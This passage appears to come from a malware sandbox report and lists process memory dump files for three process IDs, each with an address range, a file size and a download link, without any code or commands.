        • memory/2892-343-0x0000000005720000-0x0000000005D48000-memory.dmp

          Filesize

          6.2MB

          Download

        • memory/2892-344-0x0000000005630000-0x0000000005652000-memory.dmp

          Filesize

          136KB

          Download

        • memory/2892-345-0x0000000005F30000-0x0000000005F96000-memory.dmp

          Filesize

          408KB

          Download

        • memory/2892-370-0x00000000050E0000-0x00000000050F0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2892-356-0x0000000006080000-0x00000000063D4000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/2892-357-0x00000000065A0000-0x00000000065BE000-memory.dmp

          Filesize

          120KB

          Download

        • memory/2892-358-0x0000000006800000-0x000000000684C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/2892-377-0x0000000009040000-0x000000000A7AE000-memory.dmp

          Filesize

          23.4MB

          Download

        • memory/2892-361-0x0000000006BA0000-0x0000000006BBA000-memory.dmp

          Filesize

          104KB

          Download

        • memory/2892-360-0x0000000007E60000-0x00000000084DA000-memory.dmp

          Filesize

          6.5MB

          Download

        • memory/2892-363-0x0000000007890000-0x00000000078B2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/2892-362-0x0000000007930000-0x00000000079C6000-memory.dmp

          Filesize

          600KB

          Download

        • memory/2892-364-0x0000000008A90000-0x0000000009034000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/2892-341-0x0000000005080000-0x00000000050B6000-memory.dmp

          Filesize

          216KB

          Download

        • memory/2892-366-0x0000000074DA0000-0x0000000075550000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2892-367-0x00000000050E0000-0x00000000050F0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2892-368-0x0000000007B60000-0x0000000007B61000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2892-369-0x0000000009040000-0x000000000A7AE000-memory.dmp

          Filesize

          23.4MB

          Download

        • memory/3788-419-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-400-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-376-0x0000000000A60000-0x00000000021CE000-memory.dmp

          Filesize

          23.4MB

          Download

        • memory/3788-411-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-414-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-401-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-416-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-378-0x00000000777C1000-0x00000000778E1000-memory.dmp

          Filesize

          1.1MB

          Download

        • memory/3788-380-0x0000000077848000-0x0000000077849000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3788-379-0x00000000777C1000-0x00000000778E1000-memory.dmp

          Filesize

          1.1MB

          Download

        • memory/3788-381-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-394-0x0000000000A60000-0x00000000021CE000-memory.dmp

          Filesize

          23.4MB

          Download

        • memory/3788-396-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-403-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-398-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-395-0x0000000000A60000-0x00000000021CE000-memory.dmp

          Filesize

          23.4MB

          Download

        • memory/3788-402-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-420-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-404-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-418-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-397-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-417-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-406-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-407-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-408-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-409-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-410-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-412-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-413-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/3788-415-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/4376-330-0x00007FFA36590000-0x00007FFA37051000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4376-337-0x000002BBB9780000-0x000002BBB9790000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4376-333-0x000002BBB9780000-0x000002BBB9790000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4376-332-0x000002BBB9780000-0x000002BBB9790000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4376-320-0x000002BBB9790000-0x000002BBB97B2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/4376-338-0x000002BBB9780000-0x000002BBB9790000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4376-331-0x000002BBB9780000-0x000002BBB9790000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4376-336-0x00007FFA36590000-0x00007FFA37051000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4376-340-0x000002BBB9780000-0x000002BBB9790000-memory.dmp

          Filesize

          64KB

          Download